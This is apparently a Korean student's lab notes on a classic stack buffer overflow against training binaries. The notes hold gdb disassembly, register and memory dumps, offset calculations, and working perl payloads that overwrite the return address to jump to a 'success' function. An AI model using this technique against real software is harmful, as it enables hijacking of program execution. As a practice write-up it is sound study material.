




i fun
Non-debugging symbols:
0x08048278  _init
0x080482a0  __libc_start_main
0x080482b0  printf
0x080482c0  exit
0x080482d0  strcpy
0x08048304  call_gmon_start
0x08048328  __do_global_dtors_aux
0x08048364  frame_dummy
0x08048390  success  <- 목표함수
0x080483a8  main
0x080483fc  __libc_csu_init
0x0804842c  __libc_csu_fini
0x08048460  __do_global_ctors_aux
0x08048484  _fini

Dump of assembler code for function success:
0x08048390 <success+0>: push   %ebp
0x08048391 <success+1>: mov    %esp,%ebp
0x08048393 <success+3>: sub    $0x8,%esp
0x08048396 <success+6>: sub    $0xc,%esp
0x08048399 <success+9>: push   $0x80484a8
0x0804839e <success+14>:        call   0x80482b0 <printf>
0x080483a3 <success+19>:        add    $0x10,%esp
0x080483a6 <success+22>:        leave
0x080483a7 <success+23>:        ret
End of assembler dump.

 

Dump of assembler code for function main:
0x080483a8 <main+0>:    push   %ebp
0x080483a9 <main+1>:    mov    %esp,%ebp
0x080483ab <main+3>:    sub    $0x18,%esp <- 버퍼 24바이트(ebp-0x18부터 ebp까지), 저장된 ebp 4바이트까지 합쳐서 28바이트
0x080483ae <main+6>:    and    $0xfffffff0,%esp
0x080483b1 <main+9>:    mov    $0x0,%eax
0x080483b6 <main+14>:   sub    %eax,%esp
0x080483b8 <main+16>:   cmpl   $0x1,0x8(%ebp)
0x080483bc <main+20>:   jg     0x80483c8 <main+32>
0x080483be <main+22>:   sub    $0xc,%esp
0x080483c1 <main+25>:   push   $0x0
0x080483c3 <main+27>:   call   0x80482c0 <exit>
0x080483c8 <main+32>:   sub    $0x8,%esp
0x080483cb <main+35>:   mov    0xc(%ebp),%eax
0x080483ce <main+38>:   add    $0x4,%eax
0x080483d1 <main+41>:   pushl  (%eax)
0x080483d3 <main+43>:   lea    0xffffffe8(%ebp),%eax
0x080483d6 <main+46>:   push   %eax
0x080483d7 <main+47>:   call   0x80482d0 <strcpy>
0x080483dc <main+52>:   add    $0x10,%esp
0x080483df <main+55>:   sub    $0x8,%esp
0x080483e2 <main+58>:   lea    0xffffffe8(%ebp),%eax
0x080483e5 <main+61>:   push   %eax
0x080483e6 <main+62>:   push   $0x80484bb
0x080483eb <main+67>:   call   0x80482b0 <printf>
0x080483f0 <main+72>:   add    $0x10,%esp
0x080483f3 <main+75>:   mov    $0x0,%eax
0x080483f8 <main+80>:   leave
0x080483f9 <main+81>:   ret
0x080483fa <main+82>:   nop
0x080483fb <main+83>:   nop
End of assembler dump.


0x08048390 <- success 의 메모리 주소
메모리 주소를 2자리(1바이트)씩 묶어서
바이트 순서를 거꾸로 한다 (리틀 엔디언 바이트 순서)

08 04 83 90

90 83 04 08


./base `perl -e 'print "A"x28, "\x90\x83\x04\x08"

 

mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
Base3 파일을 이용한 스택 버퍼 오버플로우

 

(gdb) i fun
All defined functions:

Non-debugging symbols:
0x08048278  _init
0x080482a0  __libc_start_main
0x080482b0  printf
0x080482c0  exit
0x080482d0  strcpy
0x08048304  call_gmon_start
0x08048328  __do_global_dtors_aux
0x08048364  frame_dummy
0x08048390  success <- 공격타겟
0x080483a8  main
0x08048420  __libc_csu_init
0x08048450  __libc_csu_fini
0x08048484  __do_global_ctors_aux
0x080484a8  _fini
(gdb)

 


(gdb) disass main
Dump of assembler code for function main:
0x080483a8 <main+0>:    push   %ebp
0x080483a9 <main+1>:    mov    %esp,%ebp
0x080483ab <main+3>:    sub    $0x368,%esp
0x080483b1 <main+9>:    and    $0xfffffff0,%esp
0x080483b4 <main+12>:   mov    $0x0,%eax
0x080483b9 <main+17>:   sub    %eax,%esp
0x080483bb <main+19>:   sub    $0xc,%esp
0x080483be <main+22>:   push   $0x80484dc
0x080483c3 <main+27>:   call   0x80482b0 <printf>
0x080483c8 <main+32>:   add    $0x10,%esp
0x080483cb <main+35>:   cmpl   $0x1,0x8(%ebp)
0x080483cf <main+39>:   jg     0x80483eb <main+67>
0x080483d1 <main+41>:   sub    $0xc,%esp
0x080483d4 <main+44>:   push   $0x80484e1
0x080483d9 <main+49>:   call   0x80482b0 <printf>
0x080483de <main+54>:   add    $0x10,%esp
0x080483e1 <main+57>:   sub    $0xc,%esp
0x080483e4 <main+60>:   push   $0x0
0x080483e6 <main+62>:   call   0x80482c0 <exit>
0x080483eb <main+67>:   sub    $0x8,%esp
0x080483ee <main+70>:   mov    0xc(%ebp),%eax
0x080483f1 <main+73>:   add    $0x4,%eax
0x080483f4 <main+76>:   pushl  (%eax)
0x080483f6 <main+78>:   lea    0xfffffea8(%ebp),%eax
0x080483fc <main+84>:   push   %eax    <-break
0x080483fd <main+85>:   call   0x80482d0 <strcpy>
0x08048402 <main+90>:   add    $0x10,%esp <-break
0x08048405 <main+93>:   sub    $0x8,%esp
0x08048408 <main+96>:   lea    0xffffff78(%ebp),%eax
0x0804840e <main+102>:  push   %eax
0x0804840f <main+103>:  push   $0x80484ee
0x08048414 <main+108>:  call   0x80482b0 <printf>
0x08048419 <main+113>:  add    $0x10,%esp
0x0804841c <main+116>:  leave
0x0804841d <main+117>:  ret
0x0804841e <main+118>:  nop
0x0804841f <main+119>:  nop
End of assembler dump.

 

 

break 걸고 실행 시...

(gdb) run AAAAAAAAAA
Starting program: /home/s27/sperue/base3 AAAAAAAAAA
hi~

Breakpoint 1, 0x080483fc in main ()
(gdb) info reg
eax            0xbffff3a0       -1073744992
ecx            0x4212ee20       1108536864
edx            0x4      4
ebx            0x42130a14       1108544020
esp            0xbffff184       0xbffff184
ebp            0xbffff4f8       0xbffff4f8
esi            0x40015360       1073828704
edi            0x8048450        134513744
eip            0x80483fc        0x80483fc
eflags         0x286    646
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x33     51
(gdb)


break1 ...

(gdb) x/12 0x080483fc
0x80483fc <main+84>:    0xfecee850      0xc483ffff      0x08ec8310      0xff78858d
0x804840c <main+100>:   0x6850ffff      0x080484ee      0xfffe97e8      0x10c483ff
0x804841c <main+116>:   0x9090c3c9      0x56e58955      0xfe4ee853      0xf8b8ffff
(gdb)

Breakpoint 1, 0x080483fc in main ()
(gdb) x/12 $esp
0xbfffda04:     0xbffffbea      0x0804959c      0x40015a38      0x00000000
0xbfffda14:     0x400169e0      0xecef4f04      0x0003007a      0x00000000
0xbfffda24:     0x01000000      0x00000000      0x00000000      0x00000000
(gdb)

 


Breakpoint 2, 0x08048402 in main ()
(gdb) x/12 0x08048402
0x8048402 <main+90>:    0x8310c483      0x858d08ec      0xffffff78      0x84ee6850
0x8048412 <main+106>:   0x97e80804      0x83fffffe      0xc3c910c4      0x89559090
0x8048422 <__libc_csu_init+2>:  0xe85356e5      0xfffffe4e      0x0494f8b8      0x94f82d08
(gdb)


Breakpoint 2, 0x08048402 in main ()
(gdb) x/13 $esp
0xbfffda00:     0xbfffdc20      0xbffffbea      0x0804959c      0x40015a38
0xbfffda10:     0x00000000      0x400169e0      0xecef4f04      0x0003007a
0xbfffda20:     0x00000000      0x01000000      0x00000000      0x00000000
0xbfffda30:     0x00000000
(gdb)


0x08048390
90830408


ebp 값 - A가 시작된 메모리 주소 = 버퍼 시작에서 저장된 ebp까지의 거리(바이트)

0xbfffeb10

 

(gdb)
0xbfffeb00:     0xbfffeb40      0x4000914d      0x42010c7f      0x08048216
0xbfffeb10:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffeb20:     0x41414141      0x41414141      0x41414141      0x41414141
(gdb)
0xbfffeb30:     0x40004141      0x4001582c      0x40015bd4      0x080481f5
0xbfffeb40:     0xbfffec20      0x40008156      0x080481f5      0x0177ff8e
0xbfffeb50:     0x08048168      0xbfffebd0      0x40015b88      0x00000001
(gdb) i functions $ebp
All functions matching regular expression "$ebp":
(gdb) i reg $ebp
ebp            0xbfffec68       0xbfffec68
(gdb)

 

[s27@TRAININGSERVER sperue]$ ./base3 `perl -e 'print "A"x348, "\x90\x83\x04\x08"'`
hi~
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 릡
You're Best!!!
세그멘테이션 오류
[s27@TRAININGSERVER sperue]$

